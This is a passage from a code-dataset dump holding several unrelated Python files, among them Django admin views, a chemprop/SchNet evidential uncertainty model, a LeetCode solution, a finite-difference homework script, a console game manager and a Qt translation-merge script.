==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('services_list')\n\n\treturn render (request, 'page/services/subtype/delete.html', context)\n\n@login_required\ndef portfolio_list(request):\n portfoliolist = Portfolio.objects.all()\n context = {'portfoliolist': portfoliolist}\n return render(request, 'page/portfolio/list.html', context)\n\n\nclass PortfolioView(CreateView):\n\n def get(self, request, *args, **kwargs):\n form = PortFolioForm()\n return render(request, 'page/portfolio/create.html', {'form':form})\n\n def post(self, request, *args, **kwargs): \n if request.method == 'POST':\n form = PortFolioForm(request.POST or None, request.FILES)\n if form.is_valid():\n post = Portfolio.objects.create(title=request.POST.get('title'), \n status=form.cleaned_data.get('status'), \n description=request.POST.get('description'),\n )\n post.save()\n \n for item in request.FILES.getlist('images'):\n image = PortFolioImage.objects.create(image=item, portfolio=post)\n image.save() \n return redirect('portfolio_list')\n \n else:\n messages.error(request, 'Invalid portfolio information!')\n return redirect('portfolio_list')\n \n else:\n return render(self.request, 'page/portfolio/create.html')\n \nclass PortfolioDetail(DetailView):\n model = Portfolio\n template_name = 'page/portfolio/detail.html'\n\n\n\nclass PortfolioUpdateView(UpdateView):\n model = Portfolio\n form_class = PortFolioUpdateForm\n template_name ='page/portfolio/update.html'\n\n def post(self, request, *args, **kwargs):\n portfolio_qs = Portfolio.objects.filter(pk=kwargs['pk'])\n if portfolio_qs.exists():\n portfolio = portfolio_qs.first()\n form = self.form_class(request.POST or None, instance=portfolio)\n if form.is_valid():\n post = form.save(commit=False)\n post.save()\n if len(request.FILES.getlist('images'))>0:\n images = PortFolioImage.objects.filter(portfolio=post)\n if images.exists():\n for image in images:\n image.delete()\n for item in request.FILES.getlist('images'):\n image = PortFolioImage.objects.create(image=item, portfolio=post)\n image.save()\n else:\n for item in request.FILES.getlist('images'):\n image = PortFolioImage.objects.create(image=item, portfilio=post)\n image.save()\n \n return redirect('portfolio_list')\n else:\n return redirect('update_portfolio', pk=kwargs['pk'])\n # return redirect('portfolio_list')\n else:\n return redirect('portfolio_list')\n\n\nclass PortfolioDeleteView(DeleteView):\n model = Portfolio\n success_url = reverse_lazy('portfolio_list')\n template_name = 'page/portfolio/delete.html'\n\n # def get(self, request, *args, **kwargs):\n # return self.post(request, *args, **kwargs)\n \n \n\n\n\n\n@login_required\ndef features_list(request):\n feature = Features.objects.all()\n context = {'feature':feature}\n return render(request, 'page/features/list.html', context)\n\n@login_required\ndef create_features(request):\n if request.method == 'POST':\n form = FeaturesForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Features Added')\n return redirect('features_list')\n else:\n messages.error(request, 'Failed to add the feature!')\n return redirect('features_list')\n except:\n return redirect('features_list')\n else:\n return render(request, 'page/features/create.html')\n\n@login_required\ndef feature_detail(request, name):\n feature = Features.objects.get(title=name)\n context = {'feature': feature}\n return render(request, 'page/features/details.html', context)\n\n@login_required\ndef update_features(request, name):\n feature = Features.objects.get(title=name)\n if request.method == 'POST':\n form = FeaturesForm(request.POST or None, request.FILES, instance=feature)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Feature updated succesfully')\n return redirect('features_list')\n else:\n messages.error(request, 'Failed to update features')\n return redirect('features_list')\n except:\n return redirect('features_list')\n else:\n context = {'feature':feature}\n return render(request, 'page/features/update.html', context)\n\n@login_required\ndef features_delete(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(Features, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('features_list')\n\n\treturn render (request, 'page/features/delete.html', context)\n\n\n@login_required\ndef team_list(request):\n teamlist = Team.objects.all()\n context = {'teamlist':teamlist}\n return render(request, 'page/team/list.html', context)\n\n@login_required\ndef create_team(request):\n if request.method == 'POST':\n form = TeamForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Team Details Added Successfully')\n return redirect('team_list')\n else:\n messages.error(request, 'Failed to Add Team Details')\n return redirect('team_list')\n except:\n return redirect('team_list')\n else:\n return render(request, 'page/team/create.html')\n\n\n@login_required\ndef team_detail(request, string):\n team = Team.objects.get(name=string)\n context = {'team': team}\n return render(request, 'page/team/details.html', context)\n\n@login_required\ndef update_team(request, string):\n team = Team.objects.get(name=string)\n if request.method == 'POST':\n form = TeamForm(request.POST or None, request.FILES, instance = team)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Team Details Updated')\n return redirect('team_list')\n else:\n messages.error(request, 'Unable to Update Team Details')\n return redirect('team_list')\n except:\n return redirect('team_list')\n else:\n context = {'team': team}\n return render(request, 'page/team/update.html', context)\n\n@login_required\ndef delete_team(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(Team, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('team_list')\n\n\treturn render (request, 'page/team/delete.html', context)\n\n@login_required\ndef clients_list(request):\n clients = Clients.objects.all()\n context = {'clients': clients}\n return render(request, 'page/clients/list.html', context)\n\n@login_required\ndef create_clients(request):\n if request.method == 'POST':\n form = ClientsForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Client Added Successfully')\n return redirect('clients_list')\n else:\n messages.error(request, 'Failed to Add Client')\n return redirect('clients_list')\n except:\n return redirect('clients_list')\n else:\n return render(request, 'page/clients/create.html')\n\n@login_required\ndef clients_detail(request, name):\n client = Clients.objects.get(clientname=name)\n context = {'client': client}\n return render(request, 'page/clients/details.html', context)\n\n@login_required\ndef update_clients(request, name):\n client = Clients.objects.get(clientname=name)\n if request.method == 'POST':\n form = ClientsForm(request.POST or None, request.FILES, instance = client)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Client Details Updated Successfully')\n return redirect('clients_list')\n else:\n messages.error(request, 'Failed to Update Client Details')\n return redirect('clients_list')\n except:\n return redirect('clients_list')\n else:\n context = {'client' : client}\n return render(request, 'page/clients/update.html', context)\n\n@login_required\ndef delete_clients(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(Clients, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('clients_list')\n\n\treturn render (request, 'page/clients/delete.html', context)\n\n\n@login_required\ndef contact_list(request):\n contact = Contact.objects.all()\n context = {'contact':contact}\n return render(request, 'page/contact/list.html', context)\n\n@login_required\ndef create_contact(request):\n if request.method == 'POST':\n form = ContactForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Contact Details Created')\n return redirect('contact_list')\n else:\n messages.error(request, 'Unable to create contactform')\n return redirect('contact_list')\n except:\n return redirect('contact_list')\n else:\n return render(request, 'page/contact/create.html')\n\n@login_required\ndef contact_details(request):\n # contact = Contact.objects.get(title=name)\n contact = Contact.objects.all().first()\n context = {'contact': contact}\n return render(request, 'page/contact/details.html', context)\n\n@login_required\ndef update_contact(request):\n # contact = Contact.objects.get(title=name)\n contact = Contact.objects.all().first()\n if request.method == 'POST':\n form = ContactForm(request.POST or None, request.FILES, instance = contact)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Contact Details Updated')\n return redirect('contact_details')\n else:\n messages.error(request, 'Unable to update contactform')\n return redirect('contact_details')\n except:\n return redirect('contact_details ')\n else:\n context = {'contact':contact}\n return render(request, 'page/contact/update.html', context)\n\n\n\nclass ContactMessageList(ListView):\n model = ContactMessage\n template_name = 'page/contactmessage/list.html'\n context_object_name = 'message'\n\n\nclass ContactMessageDetail(DetailView):\n model = ContactMessage\n form_class = ContactMessageForm\n template_name = 'page/contactmessage/detail.html'\n context_object_name = 'messages'\n\nclass ContactMessageCreate(CreateView):\n \n def get(self, request, *args, **kwargs):\n form = ContactMessageForm()\n return render(request, 'page/contactmessage/create.html', {'form':form})\n\n def post(self, request, *args, **kwargs): \n if request.method == 'POST':\n firstname = request.POST.get('firstname', '')\n lastname = request.POST.get('lastname', '')\n email = request.POST.get('email', '')\n phone = request.POST.get('phone', '')\n message = request.POST.get('message', '') \n form = ContactMessageForm(firstname=firstname, lastname=lastname, emailaddress=email, phone=phone, message=message)\n form.save()\n \n context = {'firstname': firstname, 'lastname': lastname, 'email': email, 'phone':phone, 'message':message}\n\n \n send_mail_all(context, email)\n return render(request, 'page/contactmessage/create.html', context)\n\n\nclass ContactMessageDelete(DeleteView):\n model = ContactMessage\n success_url = reverse_lazy('contact_message')\n template_name = 'page/contactmessage/delete.html'","repo_name":"arjunkhattri/EliteBackend","sub_path":"constructionapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21343945671","text":"import networkx as nx\n\n\ndef learn_CL(cell_data):\n node_ids = cell_data.keys()\n G = nx.Graph()\n\n for i in range(len(node_ids)):\n G.add_node(node_ids[i])\n for j in range(i+1,len(node_ids)):\n G.add_edge(node_ids[i], node_ids[j], weight=calc_MI(cell_data[node_ids[i]],cell_data[node_ids[j]]))\n \n T = nx.minimum_spanning_tree(G)\n return T\n\n\ndef learn_CL_from_distance(d_files, tree_path):\n G = nx.Graph()\n\n for file in d_files:\n infile=open(file)\n for line in infile:\n tmp=line.strip().split(',')\n G.add_edge(tmp[0],tmp[1], weight=float(tmp[2]))\n infile.close()\n\n T = nx.minimum_spanning_tree(G)\n nx.write_gml(T, tree_path)\n \n \n","repo_name":"shahcompbio/mondrianbackup","sub_path":"mondrian/workflows/ltm/scripts/learn_CL_from_distance.py","file_name":"learn_CL_from_distance.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18058818009","text":"class Solution:\n def findDuplicates(self, nums: List[int]) -> List[int]:\n #create result arrlist\n result = []\n\n #iterate through input\n for i in nums:\n if nums[abs(i) - 1] < 0:\n result.append(abs(i))\n else:\n nums[abs(i) - 1] *= -1\n\n return result\n\n\n\"\"\"\n suboptimal: use a set to determine if there are duplicates\n O(n) space, O(n) time\n \n sorting and two pointer: O(1) space, O(n log(n)) time\n \n [-4,-3,-2,-7,8,2,-3,-1]\n \n curr_num = 2\n position = \n curr_idx = 2\n [2]\n \n if the number that we're indexing into is already a negative int, \n then append the current element that we're curently at in array's iteration to the result array\n \n Pseudocode:\n create an arrlist that will house the output\n use the current element as the index to turn that number into a negative int (don't forget to - 1 to account for indexing)\n \n iterate through the input arrlist\n if the number that we're indexing into has already been turned into a negative, then we know there's a duplicate, so add it to the result arrlist\n \n return the resutl arrlist\n\n\"\"\"\n","repo_name":"hjungj21o/Interview-DS-A","sub_path":"lc_442_find_all_duplicates_in_arr.py","file_name":"lc_442_find_all_duplicates_in_arr.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"23171281460","text":"from argparse import Namespace\nimport logging\nfrom typing import Optional\n\nfrom sklearn.gaussian_process import GaussianProcessClassifier, GaussianProcessRegressor\nimport torch\nimport torch.nn as nn\nimport numpy as np\n\nfrom .mpn import MPN\nfrom chemprop.nn_utils import get_activation_function, initialize_weights\n\nimport schnetpack as spk\nfrom schnetpack import AtomsData\nfrom schnetpack.datasets import QM9\n\nclass EvaluationDropout(nn.Dropout):\n def __init__(self, *args, **kwargs):\n super(EvaluationDropout, self).__init__(*args, **kwargs)\n self.inference_mode = False\n\n def set_inference_mode(self, val : bool):\n self.inference_mode = val\n\n def forward(self, input):\n if self.inference_mode:\n return nn.functional.dropout(input, p = 0)\n else:\n return nn.functional.dropout(input, p = self.p)\n\n\nclass MoleculeModel(nn.Module):\n \"\"\"A MoleculeModel is a model which contains a message passing network following by feed-forward layers.\"\"\"\n\n def __init__(self, classification: bool, confidence: bool = False,\n conf_type: Optional[str] = None):\n \"\"\"\n Initializes the MoleculeModel.\n\n :param classification: Whether the model is a classification model.\n :param confidence: Whether confidence values should be predicted.\n :param conf_type: Str definition of what type of confidence to use\n \"\"\"\n super(MoleculeModel, self).__init__()\n\n self.classification = classification\n # NOTE: Confidence flag is only set if the model must handle returning\n # confidence internally and for evidential learning.\n self.confidence = confidence\n self.conf_type = conf_type\n\n if self.classification:\n if self.conf_type == 'evidence':\n self.final_activation = nn.Identity()\n else:\n self.final_activation = nn.Sigmoid()\n\n self.use_last_hidden = True\n\n def create_encoder(self, args: Namespace):\n \"\"\"\n Creates the message passing encoder for the model.\n\n :param args: Arguments.\n \"\"\"\n self.encoder = MPN(args)\n self.args = args\n\n def create_ffn(self, args: Namespace):\n \"\"\"\n Creates the feed-forward network for the model.\n\n :param args: Arguments.\n \"\"\"\n first_linear_dim = args.hidden_size\n if args.use_input_features:\n first_linear_dim += args.features_dim\n\n # When using dropout for confidence, use dropouts for evaluation in addition to training.\n if args.confidence == 'dropout':\n self.dropout = EvaluationDropout(args.dropout)\n else:\n self.dropout = nn.Dropout(args.dropout)\n\n activation = get_activation_function(args.activation)\n\n output_size = args.output_size\n\n if self.confidence: # if confidence should be learned\n if args.confidence == 'evidence':\n if self.classification: # dirichlet\n # For each task, output both the positive and negative\n # evidence for that task\n output_size *= 2\n else: # normal inverse gamma\n # For each task, output the parameters of the NIG\n # distribution (gamma, lambda, alpha, beta)\n output_size *= 4\n else: # gaussian MVE\n # For each task output the paramters of the Normal\n # distribution (mu, var)\n output_size *= 2\n\n # Create FFN layers\n if args.ffn_num_layers == 1:\n ffn = [\n self.dropout,\n nn.Linear(first_linear_dim, output_size)\n ]\n else:\n ffn = [\n self.dropout,\n nn.Linear(first_linear_dim, args.ffn_hidden_size)\n ]\n for _ in range(args.ffn_num_layers - 3):\n ffn.extend([\n activation,\n self.dropout,\n nn.Linear(args.ffn_hidden_size, args.ffn_hidden_size),\n ])\n\n ffn.extend([\n activation,\n self.dropout,\n nn.Linear(args.ffn_hidden_size, args.last_hidden_size),\n ])\n\n ffn.extend([\n activation,\n self.dropout,\n nn.Linear(args.last_hidden_size, output_size),\n ])\n\n # Create FFN model\n self.ffn = nn.Sequential(*ffn)\n\n def forward(self, *input):\n \"\"\"\n Runs the MoleculeModel on input.\n\n :param input: Input.\n :return: The output of the MoleculeModel.\n \"\"\"\n ffn = self.ffn if self.use_last_hidden else nn.Sequential(\n *list(self.ffn.children())[:-1])\n output = ffn(self.encoder(*input))\n\n if self.confidence:\n if self.conf_type == \"evidence\":\n if self.classification:\n # Convert the outputs into the parameters of a Dirichlet\n # distribution (alpha).\n output = nn.functional.softplus(output) + 1\n\n else:\n min_val = 1e-6\n\n min_val = 1e-6\n # Split the outputs into the four distribution parameters\n means, loglambdas, logalphas, logbetas = torch.split(output, output.shape[1]//4, dim=1)\n lambdas = torch.nn.Softplus()(loglambdas) + min_val\n alphas = torch.nn.Softplus()(logalphas) + min_val + 1 # add 1 for numerical contraints of Gamma function\n betas = torch.nn.Softplus()(logbetas) + min_val\n\n # Return these parameters as the output of the model\n output = torch.stack((means, lambdas, alphas, betas),\n dim = 2).view(output.size())\n else:\n even_indices = torch.tensor(range(0, list(output.size())[1], 2))\n odd_indices = torch.tensor(range(1, list(output.size())[1], 2))\n\n if self.args.cuda:\n even_indices = even_indices.cuda()\n odd_indices = odd_indices.cuda()\n\n predicted_means = torch.index_select(output, 1, even_indices)\n predicted_confidences = torch.index_select(output, 1, odd_indices)\n capped_confidences = nn.functional.softplus(predicted_confidences)\n\n output = torch.stack((predicted_means, capped_confidences), dim = 2).view(output.size())\n\n # Don't apply sigmoid during training b/c using BCEWithLogitsLoss\n if self.classification and not self.training and self.use_last_hidden:\n output = self.final_activation(output)\n\n return output\n\nclass AtomisticModel(nn.Module):\n\n def __init__(self, confidence : bool = False,\n conf_type : Optional[str] = None):\n \"\"\" Requires initialization objects\n\n Wrapper class to use self.model but also give extra evidence columns\n\n :param classification: Whether the model is a classification model.\n :param confidence: Whether confidence values should be predicted.\n :param conf_type: Str definition of what type of confidence to use\n \"\"\"\n super(AtomisticModel, self).__init__()\n\n self.classification = False\n self.confidence = confidence\n self.conf_type = conf_type\n self.representation = None\n self.outputs = []\n self.model = None\n\n def create_representation(self, args: Namespace):\n \"\"\"\n Create representation layer\n\n :params args: Namespace\n \"\"\"\n # Message passing for n_interaction layers\n # n_atom_basis is the n_in\n self.representation = spk.representation.SchNet(\n n_atom_basis=args.n_atom_basis, n_filters=args.n_filters,\n n_gaussians=args.n_gaussians, n_interactions=args.n_interactions,\n cutoff=args.cutoff, cutoff_network=spk.nn.cutoff.CosineCutoff,\n )\n self.args = args\n\n def create_output_layers(self, args : Namespace, train_dataset, scaler):\n \"\"\"\n train_dataset used for computing standardization\n\n Means and stddevs used in standardization\n atomrefs is also an elementwise residual that should be learned\n\n :param args: Arguments\n :param train_dataset: AtomisticDataset used for normalization values\n :param scaler: Scaler used for normalization values\n \"\"\"\n\n # Use this for evidential parameters\n output_size = args.output_size\n if self.confidence: # if confidence should be learned\n if args.confidence == 'evidence':\n if self.classification: # dirichlet\n # For each task, output both the positive and negative\n # evidence for that task\n output_size *= 2\n else: # normal inverse gamma\n # For each task, output the parameters of the NIG\n # distribution (gamma, lambda, alpha, beta)\n output_size *= 4\n else: # gaussian MVE\n # For each task output the paramters of the Normal\n # distribution (mu, var)\n output_size *= 2\n\n # Build an output predictor network\n # Hardcode QM9.U0, do not feed in atomrefs since these are accounted\n # for when the dataset is loaded\n self.output_U0 = spk.atomistic.Atomwise(n_in=args.n_atom_basis,\n n_out=1, property=QM9.U0)\n\n self.outputs.append(self.output_U0)\n # Outputs for all non-mean predictions (that don't need to be noramlized)\n self.has_aux = False\n if output_size > 1:\n self.aux_outputs = spk.atomistic.Atomwise(n_in=args.n_atom_basis,\n n_out= output_size - 1,\n property=\"bayesian_outputs\")\n self.outputs.append(self.aux_outputs)\n self.has_aux = True\n self.args = args\n\n def create_joint_output(self, args:Namespace):\n \"\"\"\n\n Crate full_model\n\n :param args: Namespace\n \"\"\"\n # Model output\n # OUTPUT is n_out (int) – output dimension of target property (default: 1)\n self.model = spk.AtomisticModel(representation=self.representation,\n output_modules=self.outputs)\n\n def forward(self, batch, *inputs):\n \"\"\" Forward pass \"\"\"\n # Hardcode QM9.U0\n # dictionary with energy_U0 as the key (\"property=QM9.U0\")\n\n if self.args.cuda:\n batch = {k: v.cuda() for k, v in batch.items()}\n\n output = self.model(batch)\n mean_outs = output[QM9.U0]\n output_list = [mean_outs]\n if self.has_aux:\n aux_outs= output[\"bayesian_outputs\"]\n output_list.append(aux_outs)\n\n output = torch.cat(output_list, dim=1)\n\n if self.confidence:\n if self.conf_type == \"evidence\":\n if self.classification:\n # Convert the outputs into the parameters of a Dirichlet\n # distribution (alpha).\n output = nn.functional.softplus(output) + 1\n\n else:\n min_val = 1e-6\n\n # Split the outputs into the four distribution parameters\n means, loglambdas, logalphas, logbetas = torch.split(output,\n output.shape[1]//4,\n dim=1)\n lambdas = torch.nn.Softplus()(loglambdas) + min_val\n alphas = torch.nn.Softplus()(logalphas) + min_val + 1 # add 1 for numerical contraints of Gamma function\n betas = torch.nn.Softplus()(logbetas) + min_val\n\n # Return these parameters as the output of the model\n output = torch.stack((means, lambdas, alphas, betas),\n dim = 2).view(output.size())\n else:\n even_indices = torch.tensor(range(0, list(output.size())[1], 2))\n odd_indices = torch.tensor(range(1, list(output.size())[1], 2))\n\n if self.args.cuda:\n even_indices = even_indices.cuda()\n odd_indices = odd_indices.cuda()\n\n predicted_means = torch.index_select(output, 1, even_indices)\n predicted_confidences = torch.index_select(output, 1, odd_indices)\n capped_confidences = nn.functional.softplus(predicted_confidences)\n\n output = torch.stack((predicted_means, capped_confidences), dim = 2).view(output.size())\n\n return output\n\ndef build_model(args: Namespace, train_data = None, scaler = None) -> nn.Module:\n \"\"\"\n Builds a MoleculeModel, which is a message passing neural network + feed-forward layers.\n\n :param args: Arguments.\n :param train_data: Used for initialization of atomistic network\n :param scaler: Used for initialization of atomistic network\n :return: A MoleculeModel containing the MPN encoder along with final linear layers with parameters initialized.\n \"\"\"\n output_size = args.num_tasks\n args.output_size = output_size\n\n if args.atomistic:\n if args.confidence == 'nn':\n model = AtomisticModel(confidence=True,\n conf_type=\"nn\")\n elif args.confidence == \"evidence\":\n model = AtomisticModel(confidence=True,\n conf_type=\"evidence\")\n else:\n model = AtomisticModel()\n\n # Build model\n model.create_output_layers(args, train_data, scaler=scaler)\n model.create_representation(args)\n model.create_joint_output(args)\n\n else:\n is_classifier = args.dataset_type == 'classification'\n if args.confidence == 'nn':\n model = MoleculeModel(classification=is_classifier, confidence=True,\n conf_type=\"nn\")\n elif args.confidence == \"evidence\":\n model = MoleculeModel(classification=is_classifier, confidence=True,\n conf_type=\"evidence\")\n else:\n model = MoleculeModel(classification=is_classifier)\n model.create_encoder(args)\n model.create_ffn(args)\n initialize_weights(model)\n\n return model\n","repo_name":"aamini/chemprop","sub_path":"chemprop/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14662,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"34"} +{"seq_id":"24453860014","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef approximate(f,eps):\n def closure(x):\n x = (f(x+eps)-f(x))/eps\n return x\n return closure\n\n\nif __name__ == \"__main__\":\n x = np.arange(4,8.1,.1)/20\n eps = [1*10**-1,1*10**-7,1*10**-15]\n # I would have made this a loop for each eps value if we didn't have to change the line type in our plot. Since we do, I chose to do the 3 types separately, since I believe a loop would have made it more complicated\n approx1 = approximate(np.log,eps[0])(x)\n approx2 = approximate(np.log,eps[1])(x)\n approx3 = approximate(np.log,eps[2])(x)\n \n actual = 1/x\n \n plt.plot(x,approx1,label='$ \\epsilon = 1$x$10^{-1} $')\n plt.plot(x,approx2,label='$ \\epsilon = 1$x$10^{-7} $')\n plt.plot(x,approx3,label='$ \\epsilon = 1$x$10^{-15} $')\n \n plt.plot(x,actual,label='analytical derivative',linestyle=':',color='black')\n plt.title(\"Compare $ f'_{FD}(x) $ at $\\epsilon$ values and actual $f'(x) $\")\n plt.xlabel('x')\n plt.ylabel(\" $f'(x) $\")\n plt.legend()\n plt.savefig('P3.png')\n \n wordsi = str(f\"epsilon = {1*10**-7} most closely approximates the true derivative. \\nFor values of epsilon that are too small, the line is not smooth due to precision errors. I think this is a result of rounding, and not using exact numbers. \\nFor values of epsilon that are too large, the approximation is not close enough to be very accurate.\")\n answeri = str('Answer to Q-i: \\n' + wordsi)\n print(answeri)\n wordsii = str(f\"By using the chain rule and breaking down the function into smaller derivatives that it can compute accurately, automatic differentiation is able to solve these problems without having to round results or make approximations.\")\n answerii = str('\\nAnswer to Q-ii: \\n' + wordsii)\n print(answerii)\n \n plt.show()\n \n","repo_name":"geoJackSheehan/CS107_jos4435","sub_path":"homework/hw4/submission/P3.py","file_name":"P3.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20612583089","text":"from engine.windowsManager import WindowsManager\nfrom engine.items.Person import Person\nfrom engine.windows.objects import Window\nfrom engine.menuManager import *\nfrom engine.windows.rows.objects import *\nfrom functools import partial \n\nclass GameManager():\n def __init__(self):\n self.windows_manager = WindowsManager()\n self.player = Person()\n self.main_menu()\n\n def quit_game(self):\n self.windows_manager.delete_all_windows()\n\n def main_menu(self):\n window = Window()\n\n main_menu = window.menu_manager.create_menu(\n menu_name=\"Главное меню\",\n menu_items=[\n MenuItem(view='Начать игру', event = partial(self.player_window, self.player)),\n MenuItem(view='Выход', event = self.quit_game),\n ]\n )\n\n window.rows_manager.add_rows([\n MenuRowItem(main_menu)\n ])\n\n self.windows_manager.create_window(window)\n\n # def inventory_window(self, player_object:Person):\n # inventory_window = Window()\n \n # player_object.inventory.\n\n # inventory_menu = inventory_window.menu_manager.create_menu(\n # menu_name = 'Меню инвентаря',\n # menu_items = \n # )\n\n def player_window(self, player_object:Person):\n window = Window()\n\n player_menu = window.menu_manager.create_menu(\n menu_name='player_menu',\n menu_items=[\n MenuItem(view='Инвентарь', ),\n ]\n )\n\n window_menu = window.menu_manager.create_menu(\n menu_name='window_menu',\n menu_items=[\n MenuItem(keyword='q', view='Назад/Выход', event=self.windows_manager.close_and_get_prev)\n ]\n )\n\n window.rows_manager.add_rows([\n TextRowItem(player_object.name),\n TextRowItemByHeader(\"Описание:\", player_object.description),\n PlayerStatsRow(player_object),\n PlayerWeaponsEquipRow(player_object),\n PlayerArmorEquipRow(player_object),\n MenuRowItem(player_menu),\n MenuRowItem(window_menu)\n ])\n\n self.windows_manager.create_window(window)\n","repo_name":"rolanAkhmad/console_game","sub_path":"engine/gameManager.py","file_name":"gameManager.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3995336698","text":"from xml.dom import minidom, Node\nimport os\nimport os.path\n\n#defines\nTS_FILEOUT = \"Settings_%s.ts\"\n\ndef mergeDuplicates(root, db):\n\tfor child in root.childNodes:\n\t\tif (child.nodeType == Node.ELEMENT_NODE) and (child.nodeName == \"message\"):\n\t\t\tlocation = \"\"\n\t\t\tsource = \"\"\n\t\t\ttranslation = \"\"\n\t\t\ttype = \"\"\n\t\t\tfor mChild in child.childNodes:\n\t\t\t\tmChildName = mChild.nodeName\n\t\t\t\tif mChildName == \"location\":\n\t\t\t\t\tlocation = mChild.getAttribute(\"filename\")\n\t\t\t\telif mChildName == \"source\":\n\t\t\t\t\tif mChild.hasChildNodes():\n\t\t\t\t\t\tassert mChild.firstChild.nodeType == Node.TEXT_NODE\n\t\t\t\t\t\tsource = mChild.firstChild.data\n\t\t\t\telif mChildName == \"translation\":\n\t\t\t\t\ttype = mChild.getAttribute(\"type\")\n\t\t\t\t\tif mChild.hasChildNodes():\n\t\t\t\t\t\tassert mChild.firstChild.nodeType == Node.TEXT_NODE\n\t\t\t\t\t\ttranslation = mChild.firstChild.data\n\t\t\t\n\t\t\tnewLocation = location\n\t\t\tnewType = type\n\t\t\tnewTranslation = translation\n\t\t\t# if message entry already exists, try to merge in the tranlation to th unfinished one\n\t\t\t# location should be taken from the unfinished one\n\t\t\toldLocation = \"\"\n\t\t\tif source in db :\n\t\t\t\toldType = db[source][\"type\"]\n\t\t\t\toldTranslation = db[source][\"translation\"]\n\t\t\t\toldLocation = db[source][\"location\"]\n\t\t\t\tif oldType == \"unfinished\" :\n\t\t\t\t\tnewLocation = oldLocation\n\t\t\t\t\tnewType = oldType\n\t\t\t\telse :\n\t\t\t\t\tnewTranslation = oldTranslation\n\t\t\t\t\tnewType = \"\"\n\t\t\t\t#print \"merged newLocation %s \\n location1 = %s \" % (newLocation, source)\n\t\t\tdb[source] = { \"location\" : newLocation, \"source\" : source, \"translation\" : newTranslation, \"type\" : newType }\n\t\t\t\n\t\t\t#print \" location = %s \\nsource = %s \\n type = %s \" % (location, source, type)\n\t\t\t\t\t\ndef saveTS(doc, language, existingDb):\n\troot = doc.firstChild\n\twhiteList = [\"label\", \"title\", \"tooltip\"]\n\t# extract all the strings as a set of key:value pairs\n\t#removeDuplicates(root, \"btsettings\", existingDb, whiteList)\n\t# write a qt linguist ts file (don't bother creating an\n\t# xml doc for now, we'll just do it by hand)\t\n\t# see http://www.i18nguy.com/unicode/language-identifiers.html\n\theader = '''\n\n\n\nBumpTopSettings''' % language\n\tfooter = '''\n\n'''\n\tglobal TS_FILEOUT\n\tworkingDir = os.getcwd()\n\ttsFilePath = os.path.join(workingDir, TS_FILEOUT % language)\n\ttsFile = open(tsFilePath, 'w+')\n\ttsFile.write(header)\n\tfor key, value in existingDb.items():\n\t\tlocation = value[\"location\"]\n\t\tsource = key\n\t\ttranslation = value[\"translation\"]\n\t\ttype = value[\"type\"]\n\t\ttypeString = \"\"\n\t\tif \"unfinished\" == type :\n\t\t\ttypeString = \"\"\" type=\"unfinished\" \"\"\"\n\t\tmessage = \"\"\"\n\t\n\t\t\n\t\t%s\n\t\t%s\n\t\"\"\" % (location.encode(\"UTF-8\"), source.encode(\"UTF-8\"), typeString, translation.encode(\"UTF-8\"))\n\t\ttsFile.write(message)\n\ttsFile.write(footer)\t\t\t\t\n\ttsFile.close()\n\nif __name__ == \"__main__\":\n\tlanguages = [\n\t\t\"en\", \n\t\t\"zh_TW\", \n\t\t\"zh_CN\", \n\t\t\"ja\", \n\t\t\"ko\", \n\t\t\"fr\", \n\t\t\"it\", \n\t\t\"de\", \n\t\t\"ru\", \n\t\t\"es\", \n\t\t\"pt\",\n\t\t\"tr\",\n\t\t\"br\",\n\t\t\"nl\",\n\t]\n\tfor language in languages:\t\n\t\t\n\t\t# if possible, try and load the existing ts file\n\t\texistingDb = {}\n\t\ttsDoc = minidom.parse(TS_FILEOUT % language)\n\t\troot = tsDoc.getElementsByTagName(\"context\")[0]\n\t\tmergeDuplicates(root, existingDb)\n\t\tsaveTS(tsDoc, language, existingDb)\n","repo_name":"bumptop/BumpTop","sub_path":"trunk/win/BumpTop Settings/project/mergeDuplicateMessageTS.py","file_name":"mergeDuplicateMessageTS.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":511,"dataset":"github-code","pt":"34"} +{"seq_id":"20754859844","text":"import asyncio\nimport unittest\nfrom contextlib import ExitStack\nfrom decimal import Decimal\nfrom pathlib import Path\nfrom test.hummingbot.connector.gateway.clob_spot.data_sources.injective.injective_mock_utils import InjectiveClientMock\nfrom test.mock.http_recorder import HttpPlayer\nfrom typing import Awaitable, List\nfrom unittest.mock import AsyncMock, patch\n\nfrom bidict import bidict\n\nfrom hummingbot.client.config.client_config_map import ClientConfigMap\nfrom hummingbot.client.config.config_helpers import ClientConfigAdapter\nfrom hummingbot.connector.exchange_base import ExchangeBase\nfrom 